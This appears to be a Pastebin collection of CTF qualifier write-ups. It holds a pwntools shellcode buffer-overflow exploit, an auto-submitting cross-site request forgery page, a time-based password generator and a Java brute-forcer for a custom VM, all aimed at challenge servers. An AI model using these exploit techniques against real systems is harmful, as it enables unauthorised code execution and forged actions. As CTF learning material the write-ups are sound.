Advertisement
Stranck

CyberChallenge Quals 2019 WRITEUPS

Jun 7th, 2019
515
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 17.52 KB | None
  1. /*
  2. NOTICE:
  3. My english is fuckin bad, PLUS I wrote this in like 20 mins. Sorry if I fucked up badly all the grammar :(
  4. Open this page with desktop-view to enjoy ASCII arts! :D
  5. ██╗     ██╗███╗   ██╗██╗  ██╗███████╗
  6. ██║     ██║████╗  ██║██║ ██╔╝██╔════╝
  7. ██║     ██║██╔██╗ ██║█████╔╝ ███████╗
  8. ██║     ██║██║╚██╗██║██╔═██╗ ╚════██║
  9. ███████╗██║██║ ╚████║██║  ██╗███████║
  10. ╚══════╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝
  11. Instagram: https://instagram.com/stranck/
  12. Telegram shitpost channel: https://t.me/Stranck
  13. YouTube channel: https://www.youtube.com/channel/UCmMWUz0QZ7WhIBx-1Dz-IGg
  14.  
  15. ██████╗  ██████╗  ██████╗ ██████╗
  16. ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗
  17. ██║  ██║██║   ██║██║   ██║██████╔╝
  18. ██║  ██║██║   ██║██║   ██║██╔══██╗
  19. ██████╔╝╚██████╔╝╚██████╔╝██║  ██║
  20. ╚═════╝  ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
  21. CHALL Write-Up
  22. --------------
  23.  
  24. Lol I executed the command lmao
  25.  
  26. Attack Payload
  27. --------------
  28.  
  29. ncat door.quals.cyberchallenge.it 1111
  30.  
  31. ███████╗ ██████╗ ██████╗
  32. ██╔════╝██╔═══██╗██╔══██╗
  33. ███████╗██║   ██║██████╔╝
  34. ╚════██║██║   ██║██╔═══╝
  35. ███████║╚██████╔╝██║    
  36. ╚══════╝ ╚═════╝ ╚═╝    
  37. CHALL Write-Up
  38. --------------
  39.  
  40. I downloaded the executable to test it locally, and one of the first thing I tried was to get a segmentation fault by inputting a long sequence characters. It worked. So I opened in gdb and IDA and I started to reverse the code and I noticed that at the end of the program the execution returns to 0x100100. Using GDB I noticed that the input was placed at 0x1000000: hell yeah, an easy way to do a buffer overflow :D
  41. I tried putting my shellcode (to get a shell) payload at 0x100100 but it didn't worked, seems like it was cutting my input. So at 0x100100 I tried putting a jump to 0x100000 and putting the payload there, but it didn't worked because python is a fucking dumbass. Instead I've put a fantastic push to the stack with the address 0x100000 and then a return instruction... It worked! :DD
  42.  
  43. Attack Payload
  44. --------------
  45. */
  46. from pwn import *
  47. import sys
  48.  
  49. pl = asm(shellcraft.sh())
  50. # Don't waste A presses. Pannen won't be happy :(
  51. s = pl + 'b' * (0x100 - len(pl)) + asm('push 0x100000')  + asm('ret')
  52. print s
  53.  
  54. /*
  55. ███╗   ██╗███████╗ █████╗          ██████╗ █████╗ ██████╗ ███████╗███████╗██████╗ ███████╗
  56. ████╗  ██║██╔════╝██╔══██╗        ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗██╔════╝
  57. ██╔██╗ ██║███████╗███████║        ██║     ███████║██████╔╝█████╗  █████╗  ██████╔╝███████╗
  58. ██║╚██╗██║╚════██║██╔══██║        ██║     ██╔══██║██╔══██╗██╔══╝  ██╔══╝  ██╔══██╗╚════██║
  59. ██║ ╚████║███████║██║  ██║███████╗╚██████╗██║  ██║██║  ██║███████╗███████╗██║  ██║███████║
  60. ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝
  61. CHALL Write-Up
  62. --------------
  63.  
  64. The first thing I noticed was that the admin wouldn't open any links outside 10.27.x.x
  65. So I thought "What if I host a webserver?"
  66. So I did using python -m http.server and checking the logs I've seen that 10.27.0.1 was loading the web-pages I was hosting. Then I've put a redirect in js to another url and by checking again the logs I noticed that the admin requested also that page: this means he was executing the js code! I tried creating an iFrame to the original page, but obv the xss detector stopped my js code from accessing it. Then an idea came into my mind:
  67. I've copied the form from the original page, inside mine but with the action tag pointing to the real submit page. Then I wrote some js code to "compile" automatically the form and submit it, assuming that the admin was already logged. And boom, goteeeeeeeem!
  68.  
  69. Attack Payload
  70. --------------
  71. */
  72. <html>
  73.     <body>
  74.         <!-->iframe src="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd?hire=hired!" id = "asd">
  75.         </iframe-->
  76.         <form method="POST" action = "http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd">
  77.             <input type="checkbox" name="hire" value="hired!"> Hire
  78.             <br class="mb-2">
  79.             <input type="submit" value="Submit">
  80.         </form>
  81.         <script>
  82.             //setTimeout(function(){
  83.                 /*try{
  84.                     var frame = document.getElementById("asd");
  85.                     var inner = frame.contentDocument || frame.contentWindow.document;
  86.                     inner.getElementsByTagName("input")[0].setAttribute("checked", "");
  87.                     inner.getElementsByTagName("form")[0].submit();
  88.                 } catch (asd){}*/
  89.                 //document.getElementByT
  90.                 document.getElementsByTagName("input")[0].setAttribute("checked", "")
  91.                 document.getElementsByTagName("input")[1].click()
  92.                 //location.replace("done.html");
  93.             //}, 3000);
  94.         </script>
  95.     </body>
  96. </html>
  97.  
  98. /*
  99. ████████╗██╗███╗   ███╗███████╗
  100. ╚══██╔══╝██║████╗ ████║██╔════╝
  101.    ██║   ██║██╔████╔██║█████╗  
  102.    ██║   ██║██║╚██╔╝██║██╔══╝  
  103.    ██║   ██║██║ ╚═╝ ██║███████╗
  104.    ╚═╝   ╚═╝╚═╝     ╚═╝╚══════╝
  105. CHALL Write-Up
  106. --------------
  107.  
  108. I downloaded the two keys and I used them to access the server. I downloaded from it the executable (time) and the other file. I executed time and I inputted some random strings. He gave me an error. I assumed that the string in the other file was the password, so I inputted it and this time I didn't get an error, but it was waiting again for a String. Time to reverse! :D
  109. I opened the file in IDA and I noticed the "check1" and "check2" functions. I digged inside check2 and I noticed that there was a compare, between the inputted string and the result of another function: I opened it with the C view, noticing some C-standard calls (time & stuff) and a calc with the different time values. I copied the calc in a .c file, added some stuff and.... It didn't wokred, even if it should had worked. I checked what time it was on the server, noticing that it was in the PDT timezone. After some tries, I changed my pc to that timezone too (Changing it directly with PDT doesn't work :C) and... It didn't worked too. BUT after a while I executed it again and this time it worked(?????). Probably it was for the time not being exactly syncronized
  110.  
  111. Attack Payload
  112. --------------
  113. */
  114. #include <stdio.h>
  115. #include <time.h>
  116.  
  117. int main () {
  118.     time_t rawtime;
  119.    struct tm *v3;
  120.    rawtime = time(0LL);
  121.    v3 = localtime( &rawtime );
  122.     /*struct tm *v3;
  123.     time_t t = time(0LL);
  124.     v3 = localtime(&t);*/
  125.     long l = v3->tm_hour + v3->tm_min + (v3->tm_year + v3->tm_mon - v3->tm_mday) / (v3->tm_min + 1) + 3735928559LL;
  126.     printf("AoHnikoj7L2fVn41\n%o\n", l);
  127. }
  128.  
  129. /*
  130. ███████╗███████╗██╗   ██╗███╗   ███╗
  131. ██╔════╝╚══███╔╝██║   ██║████╗ ████║
  132. █████╗    ███╔╝ ██║   ██║██╔████╔██║
  133. ██╔══╝   ███╔╝  ╚██╗ ██╔╝██║╚██╔╝██║
  134. ███████╗███████╗ ╚████╔╝ ██║ ╚═╝ ██║
  135. ╚══════╝╚══════╝  ╚═══╝  ╚═╝     ╚═╝
  136.  
  137. CHALL Write-Up
  138. --------------
  139.  
  140. TODO
  141.  
  142. Attack Payload
  143. --------------
  144. */
  145. package ovh.stranck.cyberchallenge.ezVM;
  146.  
  147. import java.nio.file.Files;
  148. import java.nio.file.Paths;
  149. import java.util.ArrayList;
  150. import java.util.Arrays;
  151. import java.util.Scanner;
  152.  
  153. import ovh.stranck.ctf.App;
  154. import ovh.stranck.utils.PatternBruteforcer;
  155.  
  156. public class Main {
  157.    
  158.     public static final short NOP = 0x00;
  159.     public static final short IN = 0x01;
  160.     public static final short STO = 0x02;
  161.     public static final short ADD = 0x03;
  162.     public static final short SUB = 0x04;
  163.     public static final short NOT = 0x05;
  164.     public static final short AND = 0x06;
  165.     public static final short OR = 0x07;
  166.     public static final short XOR = 0x08;
  167.     public static final short CHK = 0x09;
  168.     public static final boolean PRINT = false;
  169.    
  170.     public static Scanner sc = new Scanner(System.in);
  171.     public static byte[] m = new byte[256];
  172.     public static byte[] p = null;
  173.     public static int pc = 0;
  174.    
  175.     public static String bruteforceRead;
  176.     public static ArrayList<String> attemps1 = new ArrayList<String>();
  177.     public static ArrayList<String> attemps2 = new ArrayList<String>();
  178.    
  179.     public static void main(String[] args) throws Exception{
  180.         //618
  181.         //p = Files.readAllBytes(Paths.get(args[0]));
  182.         p = Files.readAllBytes(Paths.get("C:\\Users\\Luca\\Desktop\\shit\\programming\\CTF\\CyberChallenge 2019\\EzVM\\check_login_key"));
  183.         // execute();
  184.         /*PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
  185.         String s = "@@@@", base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
  186.         //while(!(s = pbf.next()).equals("")){
  187.             for(int i = 0; i < m.length; i++)
  188.                 m[i] = 0;
  189.             pc = 0;
  190.             bruteforceRead = base1 + s + base2;
  191.             execute();
  192.             if(pc > 618){
  193.                 attemps1.add(bruteforceRead);
  194.             }
  195.         //}
  196.         System.out.println(attemps1.toString());*/
  197.         int[] pc = {259, 346, 440, 526, 618};
  198.         String[] segment = {"@@@@", "@@@@", "@@@@", "@@@@", "@@@@"};
  199.         bruteforce(pc, segment, 0);
  200.     }
  201.    
  202.     public static void bruteforce(int[] pc, String[] segment, int level){
  203.         PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
  204.         String s;//, base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
  205.         while(!(s = pbf.next()).equals("")){
  206.             //App.wait(1);
  207.             for(int i = 0; i < m.length; i++)
  208.                 m[i] = 0;
  209.             Main.pc = 0;
  210.            
  211.             String before = "", after = "";
  212.             for(int i = 0; i < level; i++){
  213.                 before += segment[i] + "-";
  214.                 //System.out.println(i + " " + level + " " + before);
  215.             }
  216.             for(int i = level + 1; i < pc.length; i++){
  217.                 after += "-" + segment[i];
  218.                 //System.out.println(after);
  219.             }
  220.            
  221.             bruteforceRead = before + s + after;
  222.             //System.out.println(bruteforceRead);
  223.             if(execute() == 0){
  224.                 System.out.println("FOUND: " + bruteforceRead);
  225.             } else {
  226.                 if(Main.pc > pc[level]){
  227.                     if(level + 1 < pc.length){
  228.                         segment[level] = s;
  229.                         bruteforce(pc, segment, level + 1);
  230.                     }
  231.                 }
  232.             }
  233.         }
  234.     }
  235.    
  236.     public static int execute() {
  237.         int ret = 0;
  238.         loop:
  239.         while(pc < p.length){
  240.             if(PRINT) System.out.print(pc + ":\t");
  241.             switch(p[pc++]){
  242.                 case NOP: {
  243.                     nop();
  244.                     break;
  245.                 }
  246.                 case IN: {
  247.                     in();
  248.                     break;
  249.                 }
  250.                 case STO: {
  251.                     sto();
  252.                     break;
  253.                 }
  254.                 case ADD: {
  255.                     add();
  256.                     break;
  257.                 }
  258.                 case SUB: {
  259.                     sub();
  260.                     break;
  261.                 }
  262.                 case NOT: {
  263.                     not();
  264.                     break;
  265.                 }
  266.                 case AND: {
  267.                     and();
  268.                     break;
  269.                 }
  270.                 case OR: {
  271.                     or();
  272.                     break;
  273.                 }
  274.                 case XOR: {
  275.                     xor();
  276.                     break;
  277.                 }
  278.                 case CHK: {
  279.                     ret = chk();
  280.                     if(ret == 1) {
  281.                         if(PRINT) System.out.println("Exiting at: " + pc);
  282.                         break loop;
  283.                     }
  284.                     break;
  285.                 }
  286.                 default: {
  287.                     if(PRINT) System.out.println(p[pc - 1] + ":\tCommand not found");
  288.                 }
  289.             }
  290.         }
  291.         return ret;
  292.     }
  293.    
  294.     public static void nop(){
  295.         if(PRINT) System.out.println("NOP");
  296.     }
  297.    
  298.     public static void in(){
  299.         short length = (short)(p[pc++] & 0xff);
  300.         short mem = (short)(p[pc++] & 0xff);
  301.         if(PRINT) System.out.println("IN " + length + " " + mem);
  302.        
  303.         //System.out.print(length + ">\t");
  304.         //String in = sc.nextLine();
  305.         String in = bruteforceRead;
  306.         in = in.substring(0, length);
  307.         byte[] b = in.getBytes();
  308.         for(int i = 0; i < b.length; i++)
  309.             m[mem++] = b[i];
  310.     }
  311.    
  312.     public static void sto(){
  313.         byte b = p[pc++];
  314.         //short b = (short)(p[pc++] & 0xff);
  315.         short mem = (short)(p[pc++] & 0xff);
  316.         if(PRINT) System.out.println("STO " + (short)(b & 0xff) + " " + mem);
  317.        
  318.         m[mem] = b;
  319.         //m[mem] = m[b];
  320.     }
  321.    
  322.     public static void add(){
  323.         short x = (short)(p[pc++] & 0xff);
  324.         short y = (short)(p[pc++] & 0xff);
  325.         short z = (short)(p[pc++] & 0xff);
  326.         if(PRINT) System.out.println("ADD " + x + " " + y + " " + z);
  327.        
  328.         m[z] = (byte) (m[x] + m[y]);
  329.     }
  330.    
  331.     public static void sub(){
  332.         short x = (short)(p[pc++] & 0xff);
  333.         short y = (short)(p[pc++] & 0xff);
  334.         short z = (short)(p[pc++] & 0xff);
  335.         if(PRINT) System.out.println("SUB " + x + " " + y + " " + z);
  336.        
  337.         m[z] = (byte) (m[x] - m[y]);
  338.     }
  339.    
  340.     public static void not(){
  341.         short mem = (short)(p[pc++] & 0xff);
  342.         if(PRINT) System.out.println("NOT " + mem);
  343.        
  344.         m[mem] = (byte) ~m[mem];
  345.     }
  346.    
  347.     public static void and(){
  348.         short x = (short)(p[pc++] & 0xff);
  349.         short y = (short)(p[pc++] & 0xff);
  350.         short z = (short)(p[pc++] & 0xff);
  351.         if(PRINT) System.out.println("AND " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
  352.        
  353.         m[z] = (byte) (m[x] & m[y]);
  354.     }
  355.    
  356.     public static void or(){
  357.         short x = (short)(p[pc++] & 0xff);
  358.         short y = (short)(p[pc++] & 0xff);
  359.         short z = (short)(p[pc++] & 0xff);
  360.         if(PRINT) System.out.println("OR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
  361.        
  362.         m[z] = (byte) (m[x] | m[y]);
  363.     }
  364.    
  365.     public static void xor(){
  366.         short x = (short)(p[pc++] & 0xff);
  367.         short y = (short)(p[pc++] & 0xff);
  368.         short z = (short)(p[pc++] & 0xff);
  369.         if(PRINT) System.out.println("XOR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
  370.        
  371.         m[z] = (byte) (m[x] ^ m[y]);
  372.     }
  373.    
  374.     public static int chk(){
  375.         short x = (short)(p[pc++] & 0xff);
  376.         short y = (short)(p[pc++] & 0xff);
  377.         if(PRINT) System.out.println("CHK " + x + " " + y + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
  378.        
  379.         if(m[x] != m[y])
  380.             return 1;
  381.         return 0;
  382.     }
  383. }
  384.  
  385.  
  386. package ovh.stranck.utils;
  387.  
  388. public class PatternBruteforcer {
  389.    
  390.     private String charset;
  391.     private boolean overflow = false;
  392.     private int index[];
  393.     private int length;
  394.    
  395.     public PatternBruteforcer(String charset, int length, boolean fixedLength){
  396.         this.charset = charset;
  397.         this.length = length;
  398.         index = new int[length];
  399.         index[0] = -1;
  400.         for(int i = 1; !fixedLength && i < length; i++)
  401.             index[i] = -1;
  402.     }
  403.     public String getCurrent(boolean of){
  404.         String s = "";
  405.         for(int n = 0; !of && n < length; n++)
  406.             if(index[n] >= 0)
  407.                 s = charset.charAt(index[n]) + s;
  408.         return s;
  409.     }
  410.     public synchronized String next(){
  411.         if(!this.overflow){
  412.             boolean overflow = true;
  413.             for(int i = 0; i < length && overflow; i++){
  414.                 if(++index[i] >= charset.length()){
  415.                     index[i] = 0;
  416.                     overflow = true;
  417.                 } else {
  418.                     overflow = false;
  419.                 }
  420.             }
  421.             this.overflow = overflow;
  422.         }
  423.         return getCurrent(overflow);
  424.     }
  425.     public boolean isDone(){
  426.         return overflow;
  427.     }
  428.    
  429.    
  430.    
  431.     public static void bruteforceFromCharsetLength(String charset, int length, boolean fixedLength, Action a){
  432.         int[] index = new int[length];
  433.         index[0] = -1;
  434.        
  435.         for(int i = 1; !fixedLength && i < length; i++)
  436.             index[i] = -1;
  437.        
  438.         boolean overflow = false;
  439.         while(!overflow){
  440.             overflow = true;
  441.            
  442.             for(int i = 0; i < length && overflow; i++){
  443.                
  444.                 if(++index[i] >= charset.length()){
  445.                     index[i] = 0;
  446.                     overflow = true;
  447.                     //System.out.println("overflow! INDEX of: " + i + "\tVALUE: " + index[i]);
  448.                 } else {
  449.                     overflow = false;
  450.                     //System.out.println("INDEX of: " + i + "\tVALUE: " + index[i]);
  451.                    
  452.                     String s = "";
  453.                     for(int n = 0; n < length; n++){
  454.                         //System.out.println("adding INDEX of: " + n + "\tVALUE: " + index[n]);
  455.                         if(index[n] >= 0)
  456.                             s = charset.charAt(index[n]) + s;
  457.                     }
  458.                    
  459.                     a.execute(s);
  460.                 }
  461.             }
  462.         }
  463.     }
  464. }
Advertisement
RAW Paste Data Copied
Advertisement